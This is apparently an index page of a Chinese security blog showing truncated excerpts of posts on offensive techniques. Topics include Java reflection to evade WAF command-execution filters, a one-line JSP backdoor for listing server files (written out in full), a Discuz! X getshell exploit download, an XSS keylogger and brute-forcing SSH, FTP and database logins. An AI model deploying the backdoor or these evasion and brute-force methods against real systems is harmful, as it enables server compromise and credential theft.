Java 反射执行系统命令
某些时候为了避免一些关键字或者限制,可以用反射去调用一些敏感的东东。比如某些WAF限制了:Runtime.getRuntime().exec、import java.lang.reflect.*。 package org.javaweb.url; import java.io.BufferedReader; import java.io.InputStreamReader; public clas...
阅读全文Security(80 篇文章)
Jsp一行代码遍历当前目录所有文件
有小伙伴在求只有遍历文件功能的后门,很简单: <%=java.util.Arrays.toString(new java.io.File(request.getParameter("p")).list())%> 如果需要解决中文乱码问题: <%@ page language="java" pageEncoding="UTF-8&q...
阅读全文并发请求导致的业务处理安全风险及解决方案
0x00 背景 一段简单的购买程序,看起来没有任何问题。 剩余余额、商品库存、购买权限等判断面面俱到,从头到脚包装的严严实实。 但是为何人一多就频频漏点呐?何解? 0x01 问题分析 还是以商城购买为例,商城网站是web程序和数据库两部分,业务处理流程: 用户金额是否大于商品价格—>商品库存是否充足—>购买操作:生成订单—>扣除用户金额—>商品库存减1 流程的每一部分都是w...
阅读全文菜刀Access数据库两个小工具
wooyun上的小伙伴[YY-2012 ]发了个getpass,先用这小工具干掉密码,然后就可以用access数据库打开工具打开了。 下载地址: Access.zip 关于有密码各种语言连接菜刀:http://javaweb.org/?p=78...
阅读全文String和CharArray互转小工具
每次都要转字符太麻烦了,写了个小工具。 下载地址:CharToString_fat.jar 源代码: import java.awt.Toolkit; public class Test extends javax.swing.JFrame { private static final long serialVersionUID = 1L; public Test() { initComponen...
阅读全文[网络尖刀]Discuz! X 最新Getshell漏洞Exp(自带插件)
在看之前我们首先要像乌云提交的作者致敬,因为是他那个标题才让我们尖刀团队研究出来的,当然如果有人硬是要说抄袭也可以,我们做我们的,你们说你们的,这是我们一贯的风格。 下载地址:Discuz! X 最新Getshell漏洞EXp(自带插件) 作者:网络尖刀安全团队 #1 这漏洞出现在一个DZ X系列自带的转换工具里面! 漏洞路径:utility/convert/data/config.inc.php...
阅读全文[F4CK-phithon]javascript键盘记录详解,各种浏览器适用
最近在尝试写自己的xss平台,因为对现有的平台还是不够满足。首先就是这个键盘记录功能不好加进去,要加就得改代码,感觉有点麻烦。因为我们的键盘记录是需要持续记录键盘的输入,并持续向我们的服务端发送数据,现有的xss平台每次发送来的数据都会接收一次(而不是更新之前接收过的),就会造成数据的庞大。(不知道xss.tw改进没有,我一直没有哪里的邀请码) 哦?有同学在问什么是键盘记录了,它跟xss有什么关系...
阅读全文"内网漫游"-web
经常在wooyun看到“漫游内网”之类的漏洞,那么这样的漏洞一般是怎么产生的呢? Demo1:未经校验的url重定向 import java.io.IOException; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServl...
阅读全文Java爆破SVN、FTP、任何数据库、SMTP、SSH、LDAP。。。
Java有很多开源的项目,用java求连接FTP、数据库、SVN之类的其实都很方便。既然可以很easy的求连接,那么是不是可以简单的改下弄给爆破呢?于是默默的新建了一个名叫“@z7y”的项目......本文只提供方法不提供具体工具实现! Java连接SSH: package org.javaweb.util; import java.io.IOException; import ch.ethz.s...
阅读全文Java login smtp
Java登陆邮箱(需要的jar包-mail.jar): package org.javaweb.util; import java.util.Properties; import javax.mail.Session; import javax.mail.Transport; public class Mail { public boolean login(String host, int por...
阅读全文